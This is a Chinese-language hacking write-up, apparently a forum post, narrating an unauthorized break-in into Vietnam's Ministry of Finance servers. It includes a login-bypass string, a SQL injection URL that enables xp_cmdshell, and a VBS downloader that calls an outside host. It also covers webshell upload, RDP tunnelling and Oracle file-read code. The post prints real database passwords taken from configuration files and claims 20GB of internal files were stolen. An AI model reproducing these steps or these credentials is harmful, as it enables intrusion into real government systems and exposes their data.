就这样。。。就来财政部了
Ping www.mof.gov.vn → 118.70.204.144
这种都到部委级别的站了,估计整个第4段ip全是它的。用iknock扫一下同C的ip段
于是先拿临近ip下手,也是财政部的机器,主站是144,看到有个存活的154的机器。
Ping msns.mof.gov.vn → 118.70.204.154
临近ip开放常用端口的机器不多,这个154居然用万能密码上去了,不知道什么的后台,但是从aspx中可以判断是台windows,拿来当跳板再好不过了。
http://msns.mof.gov.vn/hagiang/login.aspx http://msns.mof.gov.vn/hagiang/adminlogin.aspx 万能密码'or'1'='1 后来添加的账号和密码silic1/silic1
添加信息看不懂。。。。上传上去下载方式不是物理路径,是变量形式的。
(一开始上去不是最高权限的账户,后来习科的大牛又提权的。。。后台提权。方法未知)
从添加和编辑的页面没有找到突破点(主要看不懂啊),换个思路,点开右上角编辑个人资料页面,发现一个SA的注入点!
具体怎么研究的这个注入点,先来看一个语句
http://msns.mof.gov.vn/hagiang/iframe.aspx?page=account_edit&mode=edit&id=42+union+all+select+1,null,null,4,null,null,7,8,9,null,1,2,null,null,null,6,null,null,9,0,1,2,3;EXEC+sp_configure'show advanced options',1;RECONFIGURE;EXEC+sp_configure'xp_cmdshell',1;RECONFIGURE;select+1
第一步union出字段以后,发现表太多,支持多语句查询。但是执行exec xp_cmdshell发现报错。
多语句查询,SA权限,直接从注入点解禁xp_cmdshell,执行命令。
然后就开始各种exec_xpcmdshell执行命令。
分别ping
和ipconfig
了一下,发现ping不通外网,网关限制了。
Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::7:b9c1:37ee:f06b%11 IPv4 Address. . . . . . . . . . . : 10.192.246.45 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.192.246.1
这台机器属于纯内网,通过网关开放80端口出来,从实际效果而言,除了80端口,其他任何端口都出不来外网,跟没联网差不多。
不管怎么样,先写上webshell再说吧,毕竟只开放80端口。
路径猜不到,靠工具跑盲注点太慢了。于是干脆执行echo命令写个读iis配置的vbs文件上去:
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://silic.wiki/iis.vbs^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"C:\c:\windows\temp\iis.vbs^",2 >c:\windows\temp\a.vbs
特殊字符需要前面加个^转义,可以本地自己echo测试
尝试着echo写一个下载文件的vbs脚本到系统。然后发现cscript执行这个echo的vbs不能成功下载(本地测试成功),看来果然是出不去,只好把读取iis配置的vbs也echo上去了(很长很长很长很长)
总之最后是把webshell写上去了
这种除了80端口其他完全弹不出来的情况,上远控主机也无法上线。。还是研究怎么把3389转发出来吧。
reduh上去以后提示失败。。。于是核心群的大神找了一个神工具,原理和reduh一样,但是在此次渗透中,更实用+更稳定
D:\proxy\proxy.py -u http://msns.mof.gov.vn/hagiang/conn.aspx -l 1234 -r 3389 -v
通过MSSQL的xp_cmdshell添加了用户后成功登陆。
这台机器无法联网,DNS都解析不出来,传工具只能用webshell,每次只能传1MB左右的文件(速度还非常慢。。)
先看一下传上去的工具。。
目前还只用到这些,后期还会传nmap+wincap、Wireshark之类的,简直酸爽的不要不要的
读取了管理员的RDP记录,发现管理员没在服务器上登陆过别的机器的3389或者SSH,用iKnock扫了下内网,其中10.192.0.x这个ip段下只有一台Oracle主机存活,而10.192.246.45所在的ip段有多台主机存活
管理员登陆记录是很久以前的,所以wce并没有读到明文密码,对其他机器自然也有太好的直接下手的办法。
读取网站的web.config配置文件,发现的一些关键信息如下:
<connectionStrings> <add name="CAPMASO" connectionString="Data Source=localhost;Initial Catalog=DVHCC_CAPMASO;User ID=sa;Password=dvctt@123" providerName="System.Data.SqlClient" /> <add name="DMDC_constr" connectionString="Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.192.0.23)(PORT=1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=DNS)));User ID=dns;Password=dn$2o12;" /> <add name="DNS_constr" connectionString="Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.192.0.23)(PORT=1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=DNS)));User ID=dns;Password=dn$2o12;" /> </connectionStrings> <appSettings> <add key="AppTitle" value="D?ch v? c?ng tr?c tuy?n" /> <add key="SoTaiChinhID" value="23" /> <add key="DMDC" value="oracle" /> <add key="IDTepTK" value="41832" /> <add key="IDTepTK_XDCB" value="42521" /> <add key="ServicesURL" value="http://10.192.246.45:8888/DNSWS/DNSServiceSoapHttpPort" /> <add key="AppURL" value="http://msns.mof.gov.vn/" /> <add key="KichHoatQuaEmail" value="0" /> <add key="DiaBanID" value="12"/> <add key="CQTC_MA" value="1202"/> <add key="KhoBacCapTren" value="3449"/> </appSettings>
有MSSQL的配置信息,有Oracle的配置信息。
关于MSSQL,库中的表都是越南语或者简写命名,太不好分辨哪些有价值哪些没价值了,所以直接用习科的MSSQL脱库工具,一键全脱,然后以关键字筛选后下载。
至于Oracle,找了很多工具,最后推荐一个精简不需要sqlplus的工具[url=http://www.sqltools.net/]SQL Tools[/url]
我们选择的是这个版本: 03.10.2011 SQLTools 1.5 RC1 build 22 (Zip) 1.12M
因为本机没有撞Oracle环境,这是连接串的设置,要在TNS那里选择Bypass tnsname.ora
,并且勾上Use Service instead of sid
先试着用Oracle读文件试试吧
--查看当前的目录环境 SELECT * FROM dba_directories --设置目录 create or replace directory FILENAME as 'C:\'; --创建写入内容的表 CREATE TABLE TEST(a VARCHAR2(4000),b VARCHAR2(4000)); --读取文件 DECLARE filehandle utl_file.file_type; filebuffer varchar(200); BEGIN filehandle := utl_file.fopen('FILENAME','boot.ini','r'); loop begin utl_file.get_line(filehandle,filebuffer); INSERT INTO TEST(a) VALUES(filebuffer); EXCEPTION WHEN no_data_found THEN exit ; End; END LOOP; utl_file.fclose(filehandle); COMMIT; END;
读取文本提示失败,但是写入文件似乎是成功了。
目前对于这台服务器的思路就是写入启动项一个bat,管理员重启机器的时候添加administrators的用户。。。但是这种时效性太差。
这期间nmap分为25个RAR包依次上传完毕,正好启动nmap扫一下10.192.0.23这台机器的端口
C:\Users\iis_user\Desktop\tools>nmap -p- 10.192.0.23Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2015-06-06 13:53 SE Asia Standard Time
Nmap scan report for 10.192.0.23 Host is up (0.0019s latency). Not shown: 999 filtered ports PORT STATE SERVICE 1521/tcp open oracle
Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds
就在下一步一筹莫展的时候,从网络共享中发现了进一步的突破
\\Elearnapp2\e\Elearning\BackUp\Web <add key="solrUrl" value="http://10.192.246.34:8983/solr" /> <add key="webrootpath" value="\\10.192.246.33\e\Elearning\Web" /> <add key="chatdomain" value="http://dtttmedia.mof.gov.vn/html/hello.html" /> <add key="learningComponentsConnnectionString" value="Server=10.192.0.31;Database=elearning_scorm;uid=sa;pwd=abcd@1234;" /> <add key="pathLiveWebinar" value="C:\Program Files\Red5\webapps\livewebinar\streams\" />
web.config文件中一些关键配置。其中10.192.0.31没有开放1433,但是机器存活。
配置中的dtttmedia.mof.gov.vn/html/hello.html页面存在。
因为所涉及太广,下了内网20G的文件,有机会会将所有笔记和文件发出来下载链接的